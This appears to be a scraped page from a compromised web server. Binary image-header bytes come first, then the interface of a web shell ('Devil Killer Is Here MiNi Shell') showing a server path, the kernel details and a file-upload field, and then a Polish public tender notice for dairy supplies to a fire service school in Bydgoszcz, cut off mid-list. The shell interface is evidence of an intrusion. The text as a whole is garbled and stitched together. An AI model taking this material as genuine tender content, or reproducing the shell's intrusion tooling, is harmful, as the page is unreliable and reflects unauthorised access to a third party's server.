JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251110/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20251110/0052475601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA PODOFICERSKA PAŃSTWOWEJ STRAŻY POŻARNEJ W BYDGOSZCZY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SP PSP</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090585370</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Glinki 86</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-861</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">523498490</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">523753077</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sppsp.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d6067dcc-6780-4c53-b57f-7b1cec243a76</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00524756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00114678/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa mleka i produktów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d6067dcc-6780-4c53-b57f-7b1cec243a76 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d6067dcc-6780-4c53-b57f-7b1cec243a76</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie, którego dotyczy niniejszy dokument oznaczone jest znakiem: SPT.2370.13.2025 Wykonawcy we wszelkich kontaktach z Zamawiającym powinni powoływać się na ten znak. <br/>2.	Forma komunikacji: w postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia https://ezamowienia.gov.pl<br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy e-Zamówienia (dostępnym pod adresem: <br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO” informuję, że:<br/>1.1	Administratorem Pani/Pana danych osobowych jest Komendant Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy, ul. Glinki 86, 85-861 Bydgoszcz, tel. 52 349 84 90, e-mail: sekretariat@sppsp.bydgoszcz.pl.<br/>1.2	W Szkole Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy wyznaczony został Inspektor Ochrony Danych, mail: iod@sppsp.bydgoszcz.pl.<br/>1.3	Pani/Pana dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. w celu związanym <br/>z postępowaniem o udzielenia zamówienia publicznego na dostawę mleka i przetworów mlecznych dla Szkoły Podoficerskiej Państwowej Straży Pożarnej w Bydgoszczy SPT.2370.13.2025.<br/>1.4	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn. zm.), dalej „ustawa Pzp”.<br/>1.5	Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>1.6	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących, jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>1.7	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>1.8	Posiada Pani/Pan:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania <br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.9	Nie przysługuje Pani/Panu:<br/>1)	w związku z art. 17 ust. 3 lit. B, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wykonania wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu, w tym obowiązki wynikające z RODO. W związku z powyższym, Wykonawca zobowiązany jest do złożenia <br/>w niniejszym postępowaniu o udzielenie zamówienia publicznego oświadczenia o wypełnienie przez niego obowiązków informacyjnych przewidziany <br/>w art. 13 lub art. 14 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPT.2370.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – mleko, jogurty, śmietana i sery:<br/>Lp.	Nazwa towaru	Ilość ogółem	Jednostka miary<br/>1	mleko 2%, opak. 1l, wartość odżywcza w 100g to 50kcal, tłuszcz min. 2g, białko min. 3,2g, sól max. 0,10g, węglowodany 4,8g, w tym cukry 4,8g.	500	l<br/>2	mleko 3,2% opak. 1l, wartość odżywcza w 100g: tłuszcz min. 3,2g, węglowodany min. 4,7g w tym cukier max. 4,7g, białko min. 3,0g, sól max. 0,1g	50	l<br/>3	śmietana ukwaszona 18%, opak. 200g, wartość odżywcza w 100g: tłuszcz min. 18g, węglowodany min. 3,1g w tym cukier max. 3,1g, białko min. 2,6g, sól max. 0,11g	3300	szt<br/>4	kefir naturalny, opak. od 300 – 400g, wartość odżywcza w 100g: tłuszcz min. 1,5g, węglowodany min. 4,6g w tym cukier max. 4,6g, białko min. 3,6g, sól max. 0,10g	150	szt<br/>5	jogurt naturalny, opak. 150 – 200g, wartość odżywcza w 100g: tłuszcz min. 2,5g, węglowodany min. 5,8g w tym cukier max. 5,8g, białko min. 4,3g, sól max. 0,1g	700	szt<br/>6	ser żółty typu gouda, opak. od 1,5 – 3,5kg tłuszczu min. 40%, 800	kg<br/>7	ser żółty typu salami, opak. od 1,5 – 3,5kg tłuszczu min. 40%, 500	kg<br/>8	ser biały twaróg półtłusty, opak. 0,5 - 1,5kg, wartość odżywcza w 100g: tłuszcz min. 4g, węglowodany 4,6g w tym cukry max. 4,6g, białko min. 17g	1200	kg<br/>9	twarożek ziarnisty typu grani, opak. od 100 – 200g, wartość odżywcza w 100g: tłuszcz min. 5g, węglowodany w tym cukry max. 2,5g, białko min. 11g<br/>800	szt<br/>10	maślanka naturalna, opak. 1l karton, wartość odżywcza w 100g: tłuszcz min. 1,5g, węglowodany w tym cukry max. 5g, białko min. 3,5g	200	l<br/>11	ser typu fromage, opak. 80 – 100g, wartość odżywcza w 100 g: tłuszcz min. 31g, węglowodany min.4 g w tym cukry max. 4g, białko min. 12g	500	szt<br/>12	maślanka owocowa, opak. 1l karton, wartość odżywcza w 100g: tłuszcz min. 1,5g, węglowodany w tym cukry max. 13g, białko min. 3,2g	100	l<br/>13	jogurt typu greckiego, opak. 400g, wartość odżywcza w 100 g: tłuszcz min. 9g, węglowodany w tym cukry max. 5g, białko min. 3,6g	100	szt<br/>14	ser wędzony typu królewski kl. I podpuszczkowy dojrzewający, opak. 1,5 – 3,5kg lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych tłuszczu min. 40%, zwartość laktozy ≤0,01%	100	kg<br/>15	masło śmietankowe min. 82% tłuszczu, opak. 200g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 83g, węglowodany w tym cukry max. 0,8g, białko min. 0,6g	7000	szt<br/>16	margaryna typu palma, opak. 250g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 72g, sól. max. 0,3g	100	szt<br/>17	śmietanka UHT do kawy typu łaciata opak.10x10ml=100ml. lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100 ml :tłuszcz min. 10g, kwasy tłuszczowe min. 6,0g, węglowodany min. 4,5g, cukier max. 4,5g, białko min. 2,9g, sól max. 0,10g.	500	pacz<br/>18	śmietanka 36% typu łaciata, opak.1l, lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 36g, węglowodany min. 2,9g w tym cukier max. 2,9g, białko min. 2g	150	l<br/>19	ser typu Bydgoski opak. 1kg lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min.27g, w tym kwasy tłuszczowe 17g, białko min.25g, sól max 1,3g.	100	kg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15511000-3 - Mleko</p> <p class="mb-0">15530000-2 - Masło</p> <p class="mb-0">15431100-9 - Margaryna</p> <p class="mb-0">15512000-0 - Śmietana</p> <p class="mb-0">15551300-8 - Jogurt</p> <p class="mb-0">15551310-1 - Jogurt bez dodatków substancji smakowych</p> <p class="mb-0">15544000-3 - Ser twardy</p> <p class="mb-0">15542100-0 - Ser twarogowy</p> <p class="mb-0">15551500-0 - Maślanka</p> <p class="mb-0">15512100-1 - Śmietana chuda</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Jest to zamówienie cykliczne, udzielane przez Zamawiającego rok-rocznie <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o przedstawione wyżej kryterium. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny i czasu dostaw interwencyjnych odnoszących się do przedmiotu zamówienia zawartych w formularzu ofertowym (załącznik nr 1 do SWZ) oraz wykazach asortymentu (załącznikach nr 5 i 6).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy zamówień interwencyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – przetwory mleczne, serki i desery:<br/>Lp.	Nazwa towaru	Ilość ogółem	Jednostka miary<br/>1	jogurt owocowy mały różne smaki, opak.120 – 180 g, wartość odżywcza w 100g: tłuszcz min. 2,2g, węglowodany min. 14g w tym cukry max. 14g, białko min. 3,1g, sól max. 0,10g	6500	szt<br/>2	serek homogenizowany różne smaki, opak. od 100 – 150g, wartość odżywcza w 100g: tłuszcz min. 6,5g, węglowodany min. 16g w tym cukry max. 13g, białko min. 16g, sól max. 1,8g	2000	szt<br/>3	serek maślany kanapkowy różne smaki, opak.130 – 150 g, wartość odżywcza w 100g: tłuszcz min. 23g, węglowodany min. 3g w tym cukry max. 3g, białko min. 6g, sól max. 0,70g	3500	szt<br/>4	serek topiony kostka różne smaki, opak. 100 g wartość odżywcza w 100g: tłuszcz min. 27g, węglowodany min. 6g w tym cukry max. 3g, białko min. 7g, sól max. 0,10g	1500	szt<br/>5	serek topiony kiełbaska, opak. 100 – 120g, wartość odżywcza w 100g: tłuszcz min. 26g, węglowodany min. 1,9g w tym cukry max. 1,2g, białko min. 16g, sól max. 1,8g	2200	szt<br/>6	serek smażony z kminkiem i bez kminku, opak.2500g, wartość odżywcza w 100g: tłuszcz min. 4,3g, węglowodany w tym cukry max. 1,2g, białko min. 10g, sól max. 1,6g	100	kg<br/>7	ser sałatkowo kanapkowy, opak. 200 – 300g, wartość odżywcza w 100g: tłuszcz min. 12g, węglowodany w tym cukry max. 0,5g, białko min. 10g, sól max. 3g	650	szt<br/>8	ser topiony w krążkach, opak.180 – 200g, wartość odżywcza w 100g: tłuszcz min. 18g, węglowodany w tym cukry min. 5,8g max. 6,2g, białko min. 9,4g, max 10g, sól max. 2,6g	150	opak<br/>9	ser pleśniowy, opak. 120 – 300g wartość odżywcza w 100 g: tłuszcz min. 31g węglowodany 1,3g w tym cukry max. 0,5g, białko min.18 g, sól max 1,7g	400	szt<br/>10	ser topiony wędzony, opak. 90 – 110g wartość odżywcza w 100g: tłuszcz min. 18g węglowodany w tym cukry max. 1,2g, białko min. 18g, sól max 2,2g	1000	szt<br/>11	deser typu satino, waniliowo - czekoladowy z bitą śmietaną, opak. 120 – 180g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 2,6g, węglowodany min. 14,2g w tym cukier max. 10g, białko min. 2,2g	1000	szt<br/>12	deser typu monte, opak. 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 13,3g, węglowodany min. 15,9 g w tym cukier max. 13,7g, białko min. 2,8g	1800	szt<br/>13	ser mozzarella, opak. 125g wartość odżywcza w 100g: tłuszcz min. 19g węglowodany w tym cukry max. 1g, białko min. 18g, sól max 0,5g	1200	szt<br/>14	serek typu danio, opak. 130 g – 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 2,8g, węglowodany min. 15,8g w tym cukier max. 15g, białko min. 5,3g	2000	szt<br/>15	deser typu kinder mleczna kanapka, opak. 28g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 27,9g, węglowodany min. 34g w tym cukier max. 29,5g, białko min. 7,9g	300	szt<br/>16	ryż na mleku typu belriso, opak. 180 – 200 g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 3,8g, węglowodany min. 16,7g w tym cukier max. 10g, białko min. 3,2g	1000	szt<br/>17	deser mleczny typu monte choco różne smaki, opak. 125g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: mleko min. 44%, tłuszcz min. 0,7%, czekolada w proszku min. 0,4%	1500	szt<br/>18	serek puszysty, różne smaki typu Piątnica, opak. 150g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g: tłuszcz min. 21g, węglowodany min. 5g w tym cukier max. 3,4g, białko min. 6g	1500 szt<br/>19	jogurt typu choco stars Macadamia mix np. Muller, opak. 130g lub równoważne, za kryteria równoważności uznaje się wartość odżywcza w 100g to 131kcal, tłuszcz min. 4,6g, węglowodany 17,6 g, w tym cukry max. 15,2g, białko min.3,9g,sół 0,15g. 800	szt<br/>20	serek z truskawkami typu Hej, opak. 170g lub równoważne, za kryteria równoważności uznaje się dla wartości odżywczych w 100g, 138 kcal,tłuszcz min.3,6g, węglowodany min.20g w tym cukry max.19g, białko min.6,3g	2500	szt<br/>21	jogurt pitny butelka, różne smaki, opak. 250 – 300g wartość odżywcza w 100g: tłuszcz min. 1,8g węglowodany w tym cukry max. 9,5g, białko min. 3,0g, sól max. 0,15g	3000	szt<br/>22	ser camembert 